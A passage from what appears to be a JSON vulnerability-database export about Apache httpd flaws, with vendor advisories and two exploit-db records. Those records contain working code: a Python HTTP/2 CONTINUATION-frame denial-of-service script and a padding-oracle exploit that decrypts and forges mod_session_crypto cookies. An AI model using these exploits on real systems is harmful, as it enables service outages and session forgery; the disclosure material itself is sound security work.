Objects can now be downloaded as expected.\n(BZ#1214854)\n\n* When using OpenStack's Cinder RADOS Block Device (RBD) back-end driver\nwith Ceph administration socket enabled, Ceph could leak file descriptors\nand eventually consume the maximum number of allowed opened files.\nThis behavior caused Cinder's RBD connections to fail. Now, Ceph closes the\nadministration socket appropriately. (BZ#1220496)\n\n* When a part of a multi-part object was resent, the object became broken\ndue to a discrepancy between the object size when listing the object and when\nstating the object. Now, multi-part objects no longer become broken in such\na case. (BZ#1222091)\n\n* When the number of placement groups (PGs) in a pool was increased, Ceph\ndid not send watch or notify operations correctly. Consequently, the librbd\nlibrary presented inconsistent RBD snapshot data. Now, Ceph correctly\nre-sends operations. (BZ#1245785)\n\n* When reopening log files, Object Storage Devices (OSDs) could write data\nto the incorrect file descriptor. Consequently, log entries were lost, or\nwere written to a file descriptor, which was opened by the filestore.\nThe latter case could cause data corruption. 
This bug has been fixed.\n(BZ#1247752)\n\nAll mod_proxy_fcgi and ceph users are advised to upgrade to these updated\npackages, which correct these issues.", "modified": "2018-06-07T08:59:16", "published": "2015-10-02T00:52:51", "id": "RHSA-2015:1858", "href": "https://access.redhat.com/errata/RHSA-2015:1858", "type": "redhat", "title": "(RHSA-2015:1858) Low: mod_proxy_fcgi and ceph security and bug fix update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-08-13T18:44:59", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3583"], "description": "Red Hat Ceph Storage is a massively scalable, open, software-defined\nstorage platform that combines the most stable version of the Ceph storage\nsystem with a Ceph management platform, deployment tools, and support\nservices.\n\nThe mod_proxy_fcgi package provides a proxy module for the Apache 2.2 HTTP\nserver.\n\nA buffer overflow flaw was found in mod_proxy_fcgi's handle_headers()\nfunction. A malicious FastCGI server that httpd is configured to connect to\ncould send a carefully crafted response that would cause an httpd child\nprocess handling the request to crash. 
(CVE-2014-3583)\n\nAll mod_proxy_fcgi users are advised to upgrade to this updated package,\nwhich corrects this issue.", "modified": "2018-06-07T08:58:46", "published": "2015-10-02T00:03:29", "id": "RHSA-2015:1855", "href": "https://access.redhat.com/errata/RHSA-2015:1855", "type": "redhat", "title": "(RHSA-2015:1855) Low: mod_proxy_fcgi security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "centos": [{"lastseen": "2020-12-08T03:36:26", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2161", "CVE-2016-4975", "CVE-2016-8743", "CVE-2016-0736"], "description": "**CentOS Errata and Security Advisory** CESA-2017:0906\n\n\nThe httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.\n\nSecurity Fix(es):\n\n* It was discovered that the mod_session_crypto module of httpd did not use any mechanisms to verify integrity of the encrypted session data stored in the user's browser. A remote attacker could use this flaw to decrypt and modify session data using a padding oracle attack. (CVE-2016-0736)\n\n* It was discovered that the mod_auth_digest module of httpd did not properly check for memory allocation failures. A remote attacker could use this flaw to cause httpd child processes to repeatedly crash if the server used HTTP digest authentication. (CVE-2016-2161)\n\n* It was discovered that the HTTP parser in httpd incorrectly allowed certain characters not permitted by the HTTP protocol specification to appear unencoded in HTTP request headers. If httpd was used in conjunction with a proxy or backend server that interpreted those characters differently, a remote attacker could possibly use this flaw to inject data into HTTP responses, resulting in proxy cache poisoning. (CVE-2016-8743)\n\nNote: The fix for the CVE-2016-8743 issue causes httpd to return a \"400 Bad Request\" error to HTTP clients which do not strictly follow the HTTP protocol specification. 
A newly introduced configuration directive \"HttpProtocolOptions Unsafe\" can be used to re-enable the old less strict parsing. However, such a setting also re-introduces the CVE-2016-8743 issue.\n\nBug Fix(es):\n\n* When waking up child processes during a graceful restart, the httpd parent process could attempt to open more connections than necessary if a large number of child processes had been active prior to the restart. Consequently, a graceful restart could take a long time to complete. With this update, httpd has been fixed to limit the number of connections opened during a graceful restart to the number of active children, and the described problem no longer occurs. (BZ#1420002)\n\n* Previously, httpd running in a container returned the 500 HTTP status code (Internal Server Error) when a connection to a WebSocket server was closed. As a consequence, the httpd server failed to deliver the correct HTTP status and data to a client. With this update, httpd correctly handles all proxied requests to the WebSocket server, and the described problem no longer occurs. (BZ#1429947)\n\n* In a configuration using LDAP authentication with the mod_authnz_ldap module, the name set using the AuthLDAPBindDN directive was not correctly used to bind to the LDAP server for all queries. Consequently, authorization attempts failed. The LDAP modules have been fixed to ensure the configured name is correctly bound for LDAP queries, and authorization using LDAP no longer fails. 
(BZ#1420047)\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2017-April/034418.html\n\n**Affected packages:**\nhttpd\nhttpd-devel\nhttpd-manual\nhttpd-tools\nmod_ldap\nmod_proxy_html\nmod_session\nmod_ssl\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2017-0906.html", "edition": 6, "modified": "2017-04-13T10:59:52", "published": "2017-04-13T10:59:52", "id": "CESA-2017:0906", "href": "http://lists.centos.org/pipermail/centos-announce/2017-April/034418.html", "title": "httpd, mod_ldap, mod_proxy_html, mod_session, mod_ssl security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "hackerone": [{"lastseen": "2018-09-29T22:12:45", "bulletinFamily": "bugbounty", "bounty": 500.0, "cvelist": ["CVE-2014-3583"], "description": "_This issue was reported directly to the Apache team._\n\nA buffer overflow was found in mod_proxy_fcgi. A malicious FastCGI server could send a carefully crafted response which could lead to a heap buffer overflow.\n\nhttp://httpd.apache.org/security/vulnerabilities_24.html#2.4.11-dev\n", "modified": "2014-11-12T00:00:00", "published": "2014-09-17T00:00:00", "id": "H1:36264", "href": "https://hackerone.com/reports/36264", "type": "hackerone", "title": "Apache httpd (IBB): mod_proxy_fcgi buffer overflow", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "httpd": [{"lastseen": "2016-09-26T21:39:37", "bulletinFamily": "software", "cvelist": ["CVE-2014-3583"], "edition": 1, "description": "\nAn out-of-bounds memory read was found in mod_proxy_fcgi. A malicious\nFastCGI server could send a carefully crafted response which could\nlead to a crash when reading past the end of a heap memory or stack\nbuffer. 
This issue affects version 2.4.10 only.\n", "modified": "2015-01-30T00:00:00", "published": "2014-09-17T00:00:00", "id": "HTTPD:000FDE4E492EE77384DAD86EE8D97E4D", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 2.4.12: mod_proxy_fcgi out-of-bounds memory read", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2020-12-24T14:26:50", "bulletinFamily": "software", "cvelist": ["CVE-2014-3583"], "description": "\nAn out-of-bounds memory read was found in mod_proxy_fcgi. A malicious\nFastCGI server could send a carefully crafted response which could\nlead to a crash when reading past the end of a heap memory or stack\nbuffer. This issue affects version 2.4.10 only.\n", "edition": 5, "modified": "2014-11-12T00:00:00", "published": "2014-09-17T00:00:00", "id": "HTTPD:BC9D721F4559FBD6CD9FC08B4A702A04", "href": "https://httpd.apache.org/security_report.html", "title": "Apache Httpd < None: mod_proxy_fcgi out-of-bounds memory read", "type": "httpd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2016-12-20T22:05:49", "bulletinFamily": "software", "cvelist": ["CVE-2016-8740"], "edition": 1, "description": "\n The HTTP/2 protocol implementation (mod_http2) had an incomplete handling\n of the \n LimitRequestFields\n directive. 
This allowed an attacker to inject unlimited request headers into\n the server, leading to eventual memory exhaustion.\n", "modified": "2016-12-20T00:00:00", "published": "2016-11-22T00:00:00", "href": "https://httpd.apache.org/security_report.html", "id": "HTTPD:E91F31FD116386F2922B3EDA4BE3899B", "title": "Apache Httpd < 2.4.25: HTTP/2 CONTINUATION denial of service", "type": "httpd", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2020-12-24T14:26:50", "bulletinFamily": "software", "cvelist": ["CVE-2016-8740"], "description": "\n The HTTP/2 protocol implementation (mod_http2) had an incomplete handling\n of the \n LimitRequestFields\n directive. This allowed an attacker to inject unlimited request headers into\n the server, leading to eventual memory exhaustion.\n", "edition": 5, "modified": "2016-12-04T00:00:00", "published": "2016-11-22T00:00:00", "id": "HTTPD:D0D55654F7429E8A4965CBBE30779CD6", "href": "https://httpd.apache.org/security_report.html", "title": "Apache Httpd < None: HTTP/2 CONTINUATION denial of service", "type": "httpd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2016-12-07T12:48:55", "bulletinFamily": "software", "cvelist": ["CVE-2016-8740"], "edition": 2, "description": "\n\n The HTTP/2 protocol implementation (mod_http2) had an incomplete handling\n of the \n LimitRequestFields\n directive. 
This allowed an attacker to inject unlimited request headers into\n the server, leading to eventual memory exhaustion.\n", "modified": "2016-12-04T00:00:00", "published": "2016-11-22T00:00:00", "href": "https://httpd.apache.org/security_report.html", "id": "HTTPD:18105DABC6D0ADE97D12B90F63EAE025", "type": "httpd", "title": "Apache Httpd < 2.4.24-dev: HTTP/2 CONTINUATION denial of service", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2020-12-24T14:26:50", "bulletinFamily": "software", "cvelist": ["CVE-2016-2161"], "description": "\n Malicious input to mod_auth_digest will cause the server to crash, and \n each instance continues to crash even for subsequently valid requests.\n", "edition": 5, "modified": "2016-12-20T00:00:00", "published": "2016-07-11T00:00:00", "id": "HTTPD:D5609C15618DCADFDAD5AD396F2B83D7", "href": "https://httpd.apache.org/security_report.html", "title": "Apache Httpd < None: DoS vulnerability in mod_auth_digest", "type": "httpd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-08-04T12:16:46", "bulletinFamily": "software", "cvelist": ["CVE-2016-2161"], "edition": 2, "description": "\n Malicious input to mod_auth_digest will cause the server to crash, and \n each instance continues to crash even for subsequently valid requests.\n", "modified": "2016-12-20T00:00:00", "published": "2016-07-11T00:00:00", "href": "https://httpd.apache.org/security_report.html", "id": "HTTPD:6CAC4F8B58BB2BE168795A6BA0CA26A1", "title": "Apache Httpd < 2.4.25: DoS vulnerability in mod_auth_digest", "type": "httpd", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-08-04T12:16:46", "bulletinFamily": "software", "cvelist": ["CVE-2016-0736"], "edition": 3, "description": "\n Prior to Apache HTTP release 2.4.25, mod_sessioncrypto was encrypting its\n data/cookie using the configured ciphers with possibly either CBC or ECB\n 
modes of operation (AES256-CBC by default), hence no selectable or builtin\n authenticated encryption.\n This made it vulnerable to padding oracle attacks, particularly with CBC.\n An authentication tag (SipHash MAC) is now added to prevent such attacks.\n", "modified": "2016-12-20T00:00:00", "published": "2016-01-20T00:00:00", "id": "HTTPD:BD5F2FE0FF24D28F3450C11422A68AC8", "href": "https://httpd.apache.org/security_report.html", "title": "Apache Httpd < 2.4.25: Padding Oracle in Apache mod_session_crypto", "type": "httpd", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2020-12-24T14:26:50", "bulletinFamily": "software", "cvelist": ["CVE-2016-0736"], "description": "\n Prior to Apache HTTP release 2.4.25, mod_sessioncrypto was encrypting its\n data/cookie using the configured ciphers with possibly either CBC or ECB\n modes of operation (AES256-CBC by default), hence no selectable or builtin\n authenticated encryption.\n This made it vulnerable to padding oracle attacks, particularly with CBC.\n An authentication tag (SipHash MAC) is now added to prevent such attacks.\n", "edition": 5, "modified": "2016-12-20T00:00:00", "published": "2016-01-20T00:00:00", "id": "HTTPD:174A0D44882BCA7E2F229BC91D6D5A09", "href": "https://httpd.apache.org/security_report.html", "title": "Apache Httpd < None: Padding Oracle in Apache mod_session_crypto", "type": "httpd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "kaspersky": [{"lastseen": "2020-09-02T11:53:34", "bulletinFamily": "info", "cvelist": ["CVE-2016-8740"], "description": "### *Detect date*:\n12/05/2016\n\n### *Severity*:\nWarning\n\n### *Description*:\nAn unspecified vulnerability was found in Apache HTTP Server 2.4.17 through 2.4.23. By exploiting this vulnerability malicious users can cause denial of service. 
This vulnerability can be exploited remotely via crafted continuation frames in an HTTP/2 request.\n\n### *Affected products*:\nApache HTTP Server from 2.4.17 to 2.4.23\n\n### *Solution*:\nFor a 2.4.23 version a patch is supplied. This will be included in the next release. \n[Security Advisory \u2013 Apache Software Foundation](<http://www.securityfocus.com/archive/1/539873/30/0/threaded>)\n\n### *Original advisories*:\n[Apache httpd 2.4 vulnerabilities](<https://httpd.apache.org/security/vulnerabilities_24.html>) \n\n\n### *Impacts*:\nDoS \n\n### *Related products*:\n[Apache HTTP Server](<https://threats.kaspersky.com/en/product/Apache-HTTP-Server/>)\n\n### *CVE-IDS*:\n[CVE-2016-8740](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8740>) 5.0 Critical\n\n### *Exploitation*:\nThe following public exploits exist for this vulnerability:", "edition": 41, "modified": "2020-06-18T00:00:00", "published": "2016-12-05T00:00:00", "id": "KLA10907", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10907", "title": "KLA10907 Denial of service vulnerability in Apache HTTP Server", "type": "kaspersky", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "exploitdb": [{"lastseen": "2018-11-30T12:32:58", "description": "", "published": "2016-12-12T00:00:00", "type": "exploitdb", "title": "Apache 2.4.23 mod_http2 - Denial of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-8740"], "modified": "2016-12-12T00:00:00", "id": "EDB-ID:40909", "href": "https://www.exploit-db.com/exploits/40909", "sourceData": "#!/usr/bin/python\r\n\r\n\"\"\" source : http://seclists.org/bugtraq/2016/Dec/3\r\nThe mod_http2 module in the Apache HTTP Server 2.4.17 through 2.4.23, when the Protocols configuration includes h2 or h2c, does not restrict request-header length, which allows remote attackers to cause a denial of service (memory consumption) via crafted CONTINUATION frames in an HTTP/2 
request.(https://access.redhat.com/security/cve/cve-2016-8740)\r\n\r\nUsage : cve-2016-8740.py [HOST] [PORT]\r\n\"\"\"\r\n\r\nimport sys\r\nimport struct\r\nimport socket\r\n\r\nHOST = sys.argv[1]\r\nPORT = int(sys.argv[2])\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((HOST, PORT))\r\n\r\n# https://http2.github.io/http2-spec/#ConnectionHeader\r\ns.sendall('PRI * HTTP/2.0\\r\\n\\r\\nSM\\r\\n\\r\\n')\r\n\r\n# https://http2.github.io/http2-spec/#SETTINGS\r\nSETTINGS = struct.pack('3B', 0x00, 0x00, 0x00) # Length\r\nSETTINGS += struct.pack('B', 0x04) # Type\r\nSETTINGS += struct.pack('B', 0x00)\r\nSETTINGS += struct.pack('>I', 0x00000000)\r\ns.sendall(SETTINGS)\r\n\r\n# https://http2.github.io/http2-spec/#HEADERS\r\nHEADER_BLOCK_FRAME = '\\x82\\x84\\x86\\x41\\x86\\xa0\\xe4\\x1d\\x13\\x9d\\x09\\x7a\\x88\\x25\\xb6\\x50\\xc3\\xab\\xb6\\x15\\xc1\\x53\\x03\\x2a\\x2f\\x2a\\x40\\x83\\x18\\xc6\\x3f\\x04\\x76\\x76\\x76\\x76'\r\nHEADERS = struct.pack('>I', len(HEADER_BLOCK_FRAME))[1:] # Length\r\nHEADERS += struct.pack('B', 0x01) # Type\r\nHEADERS += struct.pack('B', 0x00) # Flags\r\nHEADERS += struct.pack('>I', 0x00000001) # Stream ID\r\ns.sendall(HEADERS + HEADER_BLOCK_FRAME)\r\n\r\n# Sending CONTINUATION frames for leaking memory\r\n# https://http2.github.io/http2-spec/#CONTINUATION\r\nwhile True:\r\n HEADER_BLOCK_FRAME = '\\x40\\x83\\x18\\xc6\\x3f\\x04\\x76\\x76\\x76\\x76'\r\n HEADERS = struct.pack('>I', len(HEADER_BLOCK_FRAME))[1:] # Length\r\n HEADERS += struct.pack('B', 0x09) # Type\r\n HEADERS += struct.pack('B', 0x01) # Flags\r\n HEADERS += struct.pack('>I', 0x00000001) # Stream ID\r\n s.sendall(HEADERS + HEADER_BLOCK_FRAME)", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/40909"}, {"lastseen": "2016-12-23T17:58:41", "description": "Apache mod_session_crypto - Padding Oracle. CVE-2016-0736. 
Webapps exploit for Multiple platform", "published": "2016-12-23T00:00:00", "type": "exploitdb", "title": "Apache mod_session_crypto - Padding Oracle", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0736"], "modified": "2016-12-23T00:00:00", "id": "EDB-ID:40961", "href": "https://www.exploit-db.com/exploits/40961/", "sourceData": "'''\r\nAdvisory: Padding Oracle in Apache mod_session_crypto\r\n\r\nDuring a penetration test, RedTeam Pentesting discovered a Padding\r\nOracle vulnerability in mod_session_crypto of the Apache web server.\r\nThis vulnerability can be exploited to decrypt the session data and even\r\nencrypt attacker-specified data.\r\n\r\n\r\nDetails\r\n=======\r\n\r\nProduct: Apache HTTP Server mod_session_crypto\r\nAffected Versions: 2.3 to 2.5\r\nFixed Versions: 2.4.25\r\nVulnerability Type: Padding Oracle\r\nSecurity Risk: high\r\nVendor URL: https://httpd.apache.org/docs/trunk/mod/mod_session_crypto.html\r\nVendor Status: fixed version released\r\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-001.txt\r\nAdvisory Status: published\r\nCVE: CVE-2016-0736\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0736\r\n\r\n\r\nIntroduction\r\n============\r\n\r\nThe module mod_session_crypto of the Apache HTTP Server can be used in\r\nconjunction with the modules mod_session and mod_session_cookie to store\r\nsession data in an encrypted cookie within the users' browsers. This\r\navoids server-side session state so that incoming HTTP requests can be\r\neasily distributed amongst a number of application web servers which do\r\nnot need to share session state.\r\n\r\n\r\nMore Details\r\n============\r\n\r\nThe module mod_session_crypto uses symmetric cryptography to encrypt and\r\ndecrypt session data and uses mod_session to store the encrypted data in\r\na cookie (usually called \"session\") within the user's browser. 
The\r\ndecrypted session is then made available to the application in an\r\nenvironment variable (in case of a CGI script) or in a custom HTTP\r\nrequest header. The application can add a custom HTTP response header\r\n(usually \"X-Replace-Session\") which instructs the HTTP server to replace\r\nthe session's content with the value of the header. Detailed\r\ninstructions to set up mod_session and mod_session_crypto can be found\r\nin the documentation:\r\nhttps://httpd.apache.org/docs/2.4/mod/mod_session.html#basicexamples\r\n\r\nThe module mod_session_crypto is configured to use either 3DES or AES\r\nwith various key sizes, defaulting to AES256. Encryption is handled by\r\nthe function \"encrypt_string\":\r\n\r\nmodules/session/mod_session_crypto.c\r\n------------------------------------------------------------------------\r\n/**\r\n * Encrypt the string given as per the current config.\r\n *\r\n * Returns APR_SUCCESS if successful.\r\n */\r\nstatic apr_status_t encrypt_string(request_rec * r, const apr_crypto_t *f,\r\n session_crypto_dir_conf *dconf, const char *in, char **out)\r\n{\r\n[...]\r\n apr_crypto_key_t *key = NULL;\r\n[...]\r\n const unsigned char *iv = NULL;\r\n[...]\r\n\r\n /* use a uuid as a salt value, and prepend it to our result */\r\n apr_uuid_get(&salt);\r\n\r\n[...]\r\n\r\n res = apr_crypto_passphrase(&key, &ivSize, passphrase,\r\n strlen(passphrase),\r\n (unsigned char *) (&salt), sizeof(apr_uuid_t),\r\n *cipher, APR_MODE_CBC, 1, 4096, f, r->pool);\r\n\r\n[...]\r\n\r\n res = apr_crypto_block_encrypt_init(&block, &iv, key, &blockSize, r->pool);\r\n[...]\r\n res = apr_crypto_block_encrypt(&encrypt, &encryptlen, (unsigned char *)in,\r\n strlen(in), block);\r\n[...]\r\n res = apr_crypto_block_encrypt_finish(encrypt + encryptlen, &tlen, block);\r\n[...]\r\n\r\n /* prepend the salt and the iv to the result */\r\n combined = apr_palloc(r->pool, ivSize + encryptlen + sizeof(apr_uuid_t));\r\n memcpy(combined, &salt, sizeof(apr_uuid_t));\r\n 
memcpy(combined + sizeof(apr_uuid_t), iv, ivSize);\r\n memcpy(combined + sizeof(apr_uuid_t) + ivSize, encrypt, encryptlen);\r\n\r\n /* base64 encode the result */\r\n base64 = apr_palloc(r->pool, apr_base64_encode_len(ivSize + encryptlen +\r\n sizeof(apr_uuid_t) + 1)\r\n * sizeof(char));\r\n[...]\r\n return res;\r\n}\r\n------------------------------------------------------------------------\r\n\r\nThe source code shows that an encryption key is derived from the\r\nconfigured password and a randomly chosen salt by calling the function\r\n\"apr_crypto_passphrase\". This function internally uses PBKDF2 to derive\r\nthe key. The data is then encrypted and the salt and IV prepended to the\r\nencrypted data. Before returning to the caller, the result is encoded as\r\nbase64.\r\n\r\nThis procedure does not guarantee integrity of the ciphertext, so the\r\nApache module is unable to detect whether a session sent back to the\r\nserver has been tampered with. Depending on the application this often\r\nmeans that attackers are able to exploit a Padding Oracle vulnerability.\r\nThis allows decrypting the session and encrypting arbitrary data chosen\r\nby the attacker.\r\n\r\n\r\nProof of Concept\r\n================\r\n\r\nThe vulnerability can be reproduced as follows. 
First, the modules\r\nmod_session, mod_session_crypto and mod_session_cookie are enabled and\r\nconfigured:\r\n\r\n------------------------------------------------------------------------\r\nSession On\r\nSessionEnv On\r\nSessionCookieName session path=/\r\nSessionHeader X-Replace-Session\r\nSessionCryptoPassphrase RedTeam\r\n------------------------------------------------------------------------\r\n\r\nIn addition, CGI scripts are enabled for a folder and the following CGI\r\nscript is saved as \"status.rb\" and is made available to clients:\r\n\r\n------------------------------------------------------------------------\r\n#!/usr/bin/env ruby\r\n\r\nrequire 'cgi'\r\n\r\ncgi = CGI.new\r\ndata = CGI.parse(ENV['HTTP_SESSION'])\r\n\r\nif data.has_key? 'username'\r\n puts\r\n puts \"your username is %s\" % data['username']\r\n exit\r\nend\r\n\r\nputs \"X-Replace-Session: username=guest&timestamp=\" + Time.now.strftime(\"%s\")\r\nputs\r\nputs \"not logged in\"\r\n------------------------------------------------------------------------\r\n\r\nOnce the CGI script is correctly set up, the command-line HTTP client curl\r\ncan be used to access it:\r\n\r\n------------------------------------------------------------------------\r\n$ curl -i http://127.0.0.1:8080/cgi-bin/status.rb\r\nHTTP/1.1 200 OK\r\nDate: Tue, 19 Jan 2016 13:23:19 GMT\r\nServer: Apache/2.4.10 (Ubuntu)\r\nSet-Cookie: session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vpLQ\r\n l1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=;path=/\r\nCache-Control: no-cache\r\nSet-Cookie: session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vpLQ\r\n l1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=;path=/\r\nTransfer-Encoding: chunked\r\nContent-Type: application/x-ruby\r\n\r\nnot logged in\r\n------------------------------------------------------------------------\r\n\r\nThe example shows that a new encrypted cookie with the name \"session\" is\r\nreturned, and the response body contains the text \"not 
logged in\".\r\nCalling the script again with the cookie just returned reveals that the\r\nusername in the session is set to \"guest\":\r\n\r\n------------------------------------------------------------------------\r\n$ curl -b session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vp\\\r\nLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU= \\\r\nhttp://127.0.0.1:8080/cgi-bin/status.rb\r\n\r\nyour username is guest\r\n------------------------------------------------------------------------\r\n\r\nSending a modified cookie ending in \"u=\" instead of \"U=\" will invalidate\r\nthe padding at the end of the ciphertext, so the session cannot be\r\ndecrypted correctly and is therefore not passed to the CGI script, which\r\nreturns the text \"not logged in\" again:\r\n\r\n------------------------------------------------------------------------\r\n$ curl -b session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vp\\\r\nLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRu= \\\r\nhttp://127.0.0.1:8080/cgi-bin/status.rb\r\n\r\nnot logged in\r\n------------------------------------------------------------------------\r\n\r\nThis verifies the existence of the Padding Oracle vulnerability. 
The\r\nPython library[1] python-paddingoracle was then used to implement\r\ndecrypting the session by exploiting the Padding Oracle vulnerability.\r\n\r\nexploit.py\r\n------------------------------------------------------------------------\r\n'''\r\n\r\nfrom paddingoracle import BadPaddingException, PaddingOracle\r\nfrom base64 import b64encode, b64decode\r\nimport requests\r\n\r\nclass PadBuster(PaddingOracle):\r\n def __init__(self, valid_cookie, **kwargs):\r\n super(PadBuster, self).__init__(**kwargs)\r\n self.wait = kwargs.get('wait', 2.0)\r\n self.valid_cookie = valid_cookie\r\n\r\n def oracle(self, data, **kwargs):\r\n v = b64encode(self.valid_cookie+data)\r\n\r\n response = requests.get('http://127.0.0.1:8080/cgi-bin/status.rb',\r\n cookies=dict(session=v), stream=False, timeout=5, verify=False)\r\n\r\n if 'username' in response.content:\r\n logging.debug('No padding exception raised on %r', v)\r\n return\r\n\r\n raise BadPaddingException\r\n\r\nif __name__ == '__main__':\r\n import logging\r\n import sys\r\n\r\n if not sys.argv[2:]:\r\n print 'Usage: [encrypt|decrypt] <session value> <plaintext>'\r\n sys.exit(1)\r\n\r\n logging.basicConfig(level=logging.WARN)\r\n mode = sys.argv[1]\r\n session = b64decode(sys.argv[2])\r\n padbuster = PadBuster(session)\r\n\r\n if mode == \"decrypt\":\r\n cookie = padbuster.decrypt(session[32:], block_size=16, iv=session[16:32])\r\n print('Decrypted session:\\n%r' % cookie)\r\n elif mode == \"encrypt\":\r\n key = session[0:16]\r\n plaintext = sys.argv[3]\r\n\r\n s = padbuster.encrypt(plaintext, block_size=16)\r\n\r\n data = b64encode(key+s[0:len(s)-16])\r\n print('Encrypted session:\\n%s' % data)\r\n else:\r\n print \"invalid mode\"\r\n sys.exit(1)\r\n\r\n'''\r\n------------------------------------------------------------------------\r\n\r\nThis Python script can then be used to decrypt the session:\r\n\r\n------------------------------------------------------------------------\r\n$ time python exploit.py decrypt 
sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\\\r\nHztmf0CFsp1vpLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=\r\nDecrypted session:\r\nb'username=guest&timestamp=1453282205\\r\\r\\r\\r\\r\\r\\r\\r\\r\\r\\r\\r\\r'\r\n\r\nreal 6m43.088s\r\nuser 0m15.464s\r\nsys 0m0.976s\r\n------------------------------------------------------------------------\r\n\r\nIn this sample application, the username and a timestamp are included in\r\nthe session data. The Python script can also be used to encrypt a new\r\nsession containing the username \"admin\":\r\n\r\n------------------------------------------------------------------------\r\n$ time python exploit.py encrypt sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\\\r\nHztmf0CFsp1vpLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYB\\\r\nRU= username=admin\r\n\r\nEncrypted session:\r\nsxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7zmQ/GLFjF4pcXY\r\n\r\nreal3m38.002s\r\nusers0m8.536s\r\nsys0m0.512s\r\n\r\n------------------------------------------------------------------------\r\n\r\nSending this newly encrypted session to the server shows that the\r\nusername is now \"admin\":\r\n\r\n------------------------------------------------------------------------\r\n$ curl -b session=sxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7\\\r\nzmQ/GLFjF4pcXY http://127.0.0.1:8080/cgi-bin/status.rb\r\n\r\nyour username is admin\r\n------------------------------------------------------------------------\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nUse a different means to store the session, e.g. in a database by using\r\nmod_session_dbd.\r\n\r\n\r\nFix\r\n===\r\n\r\nUpdate to Apache HTTP version 2.4.25 (see [2]).\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nApplications which use mod_session_crypto usually store sensitive values\r\nin the session and rely on an attacker's inability to decrypt or modify\r\nthe session. 
Successful exploitation of the Padding Oracle vulnerability\r\nsubverts this mechanism and allows constructing sessions with arbitrary\r\nattacker-specified content. Depending on the application this may\r\ncompletely subvert the application's security. Therefore, this\r\nvulnerability poses a high risk.\r\n\r\n\r\nTimeline\r\n========\r\n\r\n2016-01-11 Vulnerability identified\r\n2016-01-12 Customer approved disclosure to vendor\r\n2016-01-12 CVE number requested\r\n2016-01-20 Vendor notified\r\n2016-01-22 Vendor confirmed the vulnerability\r\n2016-02-03 Vendor provided patch\r\n2016-02-04 Apache Security Team assigned CVE number\r\n2016-03-03 Requested status update from vendor, no response\r\n2016-05-02 Requested status update from vendor, no response\r\n2016-07-14 Requested status update and roadmap from vendor\r\n2016-07-21 Vendor confirms working on a new release and inquired whether the\r\n patch fixes the vulnerability\r\n2016-07-22 RedTeam confirms\r\n2016-08-24 Requested status update from vendor\r\n2016-08-29 Vendor states that there is no concrete timeline\r\n2016-12-05 Vendor announces a 